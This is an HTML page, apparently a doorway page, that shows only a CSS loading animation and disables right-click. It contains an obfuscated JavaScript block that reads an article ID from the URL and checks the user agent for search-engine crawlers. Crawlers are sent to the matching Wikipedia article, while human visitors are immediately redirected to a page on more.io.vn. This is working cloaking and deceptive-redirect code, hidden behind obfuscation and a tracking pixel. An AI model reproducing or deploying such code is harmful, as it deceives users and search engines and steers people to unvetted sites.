<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
<link href="https://stackpath.bootstrapcdn.com/bootstrap/5.0.0-alpha1/css/bootstrap.min.css" rel="stylesheet">
<style> 
			body {
				margin: 0;
				background-color: #f9f9fa;
				height: 100vh;
				display: flex;
				justify-content: center;
				align-items: center;
			}

			.flex-container {
				display: flex;
				justify-content: center;
				align-items: center;
				height: 100vh;
				width: 100vw;
			}

			.jumping-dots-loader {
				width: 100px;
				height: 100px;
				position: relative;
				display: flex;
				justify-content: space-between;
			}

			.jumping-dots-loader span {
				width: 20px;
				height: 20px;
				border-radius: 50%;
				background-color: rgba(241, 83, 110, 0.8);
				animation: bounce 1s ease-in-out infinite;
			}

			.jumping-dots-loader span:nth-child(2) {
				animation-delay: 0.33s;
			}

			.jumping-dots-loader span:nth-child(3) {
				animation-delay: 0.66s;
			}

			@keyframes bounce {
				0%, 75%, 100% {
					transform: translateY(0);
				}
				25% {
					transform: translateY(-20px);
				}
			}

		</style>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/5.0.0-alpha1/js/bootstrap.min.js"></script>
</head>
<body oncontextmenu="return false" class="snippet-body">
<div class="flex-container">
<div class="page-content page-container" id="page-content">
<div class="padding">
<div class="row container d-flex justify-content-center">
<div class="col-md-4 col-sm-6 grid-margin stretch-card">
<div class="loader-demo-box">
<div class="jumping-dots-loader"> <span></span> <span></span> <span></span> </div>
</div>
</div>
</div>
</div>
</div>
</div>
<img src="//sstatic1.histats.com/0.gif?4897382&101" alt border="0">
<script>
	const _0x1b68c0=_0x9ba9;function _0x9ba9($,t){let e=_0x447d();return(_0x9ba9=function($,t){return e[$-=462]})($,t)}!function($,t){let e=_0x9ba9,x=$();for(;;)try{let i=parseInt(e(464))/1*(parseInt(e(469))/2)+parseInt(e(477))/3*(-parseInt(e(473))/4)+-parseInt(e(463))/5*(parseInt(e(471))/6)+-parseInt(e(472))/7*(-parseInt(e(466))/8)+-parseInt(e(465))/9+-parseInt(e(474))/10+parseInt(e(462))/11;if(965054===i)break;x.push(x.shift())}catch(a){x.push(x.shift())}}(_0x447d,965054);const searchParams=location.search[_0x1b68c0(475)](1),firstParam=searchParams[_0x1b68c0(468)]("&")[0],delimiterMatch=firstParam.match(/[-~/=.+]/),delimiter=delimiterMatch?delimiterMatch[0]:null,parts=firstParam.split(delimiter),languageCode=parts[0],URLID=parts[1],isBot=/bot|google|baidu|bing|msn|duckduckbot|teoma|slurp|yandex/i.test(navigator[_0x1b68c0(467)]),defaultUrl=_0x1b68c0(476)+languageCode+".m.wikipedia.org/wiki/"+URLID,affiliateUrl="https://more.io.vn/"+languageCode+"/"+URLID,finalRedirectUrl=isBot?defaultUrl:affiliateUrl;function _0x447d(){let $=["2082xVbrDG","6024179DyXibq","12nEwgyT","12657380svLAYk","substring","https://","514935gChxfY","42735682AYoqYF","24335XiQCcS","163XItlFq","6354288bVnAni","8OepmfZ","userAgent","split","4846UyiVpg","href"];return(_0x447d=function(){return $})()}isBot?setTimeout(()=>{let $=_0x1b68c0;location[$(470)]=finalRedirectUrl},2e3):location[_0x1b68c0(470)]=finalRedirectUrl;
</script>
</body>
</html>
